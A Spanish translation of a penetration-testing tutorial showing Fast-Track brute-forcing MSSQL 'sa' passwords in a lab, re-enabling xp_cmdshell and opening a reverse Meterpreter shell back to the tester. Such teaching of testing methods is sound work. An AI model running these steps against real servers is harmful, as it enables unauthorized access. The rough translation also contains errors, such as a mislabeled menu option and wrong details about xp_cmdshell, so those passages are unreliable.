MSSQL Bruter
De www.metasploit-es.com.ar
MSSQL Bruter
Probablemente uno de mis aspectos favoritos de Fast-Track es el MSSQL Bruter. Es probablemente uno de los MSSQL Bruter más robustos y único en el mercado hoy en día. Al realizar pruebas de penetración interna, que a menudo encuentran que MSSQL "sa" contraseñas a menudo son pasados por alto. En primer lugar, una breve historia detrás de estas "sa" las cuentas están en orden.
La cuenta "sa" es la cuenta de administrador del sistema para MSSQL y utilizando las "Mixed Mode" o "autenticación de SQL",la cuenta SQL "sa" se crea de manera automática. Los administradores tienen que introducir una contraseña al crear estas cuentas y, a menudo dejar estas como contraseñas débiles.
Fast-Track ataca esta debilidad e intenta identificar los servidores SQL con cuentas debiles "sa" y sus contraseñas. Una vez que estas contraseñas se han descubierto, Fast-Track usara cualquier payload avanzado para la conversión binaria utilizando ventanas de depuración. Vamos a explorar un espacio de la clase C de direcciones para servidores SQL. Una cosa a tener en cuenta cuando a través de estos pasos es que se le pedirá si desea realizar el descubrimiento de SQL avanzado.
Para explicar esto, primero necesitamos entender instalaciones predeterminadas de SQL Server. Al instalar SQL Server, por defecto se instala SQL en el puerto TCP 1433. En SQL Server 2005 +, puede especificar la asignación de puertos dinámicos que harán que el número al azar y un poco difíciles de identificar. Afortunadamente para nosotros, el servidor SQL también instala el puerto 1434 UDP que nos dice lo que en el puerto TCP del servidor SQL se está ejecutando. Al realizar la identificación avanzada, Fast-Track utilizará el módulo de Metasploit auxiliar al puerto 1433 de consulta para los puertos, de lo contrario Fast-Track sólo acabará de exploración para el puerto 1433. Echemos un vistazo a la SQL Bruter. Tenga en cuenta que al especificar el descubrimiento avanzado, se necesita mucho más tiempo si no se especifica el thread.
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number: 3
Microsoft SQL Attack Tools
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 2
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
Enter Option:
Fast-Track tiene una gran lista de opciones para que echemos un vistazo a cada uno de ellos:
==
- La opción "a", "attempt SQL Ping and Auto Quick Brute Force" intentará escanear un rango de direcciones IP.
Esto utiliza la misma sintaxis que Nmap y Usa un diccionario en la lista predefinida de contraseñas desde hace unos cincuenta años.
- La Opción "m", "mass scan and dictionary brute", explorará un rango de direcciones IP y permite especificar
una lista de palabras de su propio diccionario, sin embargo Fast-Track viene con una lista de palabras decente ubicado en 'bin / dict ".
- La Opción "s","single Target (Attack a Single Target with big dictionary", le permitirá realizar un ataque
a fuerza bruta a una dirección IP específica 1 con una lista de palabras de gran tamaño.
- La Opción "f", "find SQL Ports (SQL Ping)", sólo buscar servidores SQL y no atacarlos.
- La Opción "i", "i want a command prompt and know which system is vulnerable", usada cuando usted ya conoce
una clave para la cuenta 'sa'y le aparecera el simbolo del sistema.
- La Opción "s", "vulnerable system, I want to add a local admin on the box...", se agrega un nuevo usuario
administrativo en una caja que usted sepa que es vulnerable.
- Opción "e", "enable xp_cmdshell if its disabled (sql2k and sql2k5)", es un procedimiento almacenado de Fast-Track
utilizado para ejecutar comandos subyacentes del sistema. De forma predeterminada, está deshabilitado en SQL Server 2005
y anteriores, pero un ataque de Fast-Track puede volverlo a activar si se ha desactivado. Sólo una cosa buena para hablar,
al atacar el sistema remoto con cualquiera de las opciones, Fast-Track de forma automática intentará volver a habilitar
xp_cmdshell por si acaso.
==
Vamos a correr a través de Quick Brute Force..
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
Enter Option: a
Enter username for SQL database (example:sa): sa
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 10.211.55.1/24
Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting
in order to determine where the SQL servers are at. This could take quite a long time.
Do you want to perform advanced identification, yes or no: yes
[-] Launching SQL Ping, this may take a while to footprint.... [-]
[*] Please wait while we load the module tree...
Brute forcing username: sa
Be patient this could take awhile...
Brute forcing password of password2 on IP 10.211.55.128:1433
Brute forcing password of on IP 10.211.55.128:1433
Brute forcing password of password on IP 10.211.55.128:1433
SQL Server Compromised: "sa" with password of: "password" on IP 10.211.55.128:1433
Brute forcing password of sqlserver on IP 10.211.55.128:1433
Brute forcing password of sql on IP 10.211.55.128:1433
Brute forcing password of password1 on IP 10.211.55.128:1433
Brute forcing password of password123 on IP 10.211.55.128:1433
Brute forcing password of complexpassword on IP 10.211.55.128:1433
Brute forcing password of database on IP 10.211.55.128:1433
Brute forcing password of server on IP 10.211.55.128:1433
Brute forcing password of changeme on IP 10.211.55.128:1433
Brute forcing password of change on IP 10.211.55.128:1433
Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433
Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433
Brute forcing password of Sqlserver on IP 10.211.55.128:1433
Brute forcing password of SqlServer on IP 10.211.55.128:1433
Brute forcing password of Password1 on IP 10.211.55.128:1433
Brute forcing password of xp on IP 10.211.55.128:1433
Brute forcing password of nt on IP 10.211.55.128:1433
Brute forcing password of 98 on IP 10.211.55.128:1433
Brute forcing password of 95 on IP 10.211.55.128:1433
Brute forcing password of 2003 on IP 10.211.55.128:1433
Brute forcing password of 2008 on IP 10.211.55.128:1433
*******************************************
The following SQL Servers were compromised:
*******************************************
1. 10.211.55.128:1433 *** U/N: sa P/W: password ***
*******************************************
To interact with system, enter the SQL Server number.
Example: 1. 192.168.1.32 you would type 1
Enter the number:
En cuanto a la salida anterior, que han puesto en peligro un servidor SQL en la dirección IP 10.211.55.128 en el puerto 1433 con nombre de usuario "sa" y la contraseña "password". Ahora queremos el pleno acceso a este chico malo. Hay un montón de opciones que puede especificar en este caso, usaremos una consola Meterpreter pero hay otras opciones.
Enter number here: 1 Enabling: XP_Cmdshell... Finished trying to re-enable xp_cmdshell stored procedure if disabled. Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. Setting default directory... What port do you want the payload to connect to you on: 4444 Metasploit Reverse Meterpreter Upload Detected.. Launching Meterpreter Handler. Creating Metasploit Reverse Meterpreter Payload.. Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6 Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad Metasploit payload delivered.. Converting our payload to binary, this may take a few... Cleaning up... Launching payload, this could take up to a minute... When finished, close the metasploit handler window to return to other compromised SQL Servers. [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030) meterpreter >
Éxito! Ahora tenemos acceso total a esta máquina. Muy mala cosa, y todo a través de adivinar el pass de la cuenta "sa".
© Offensive Security 2009
Original by www.offensive-security.com/metasploit-unleashed/ Traslated by tundervirld
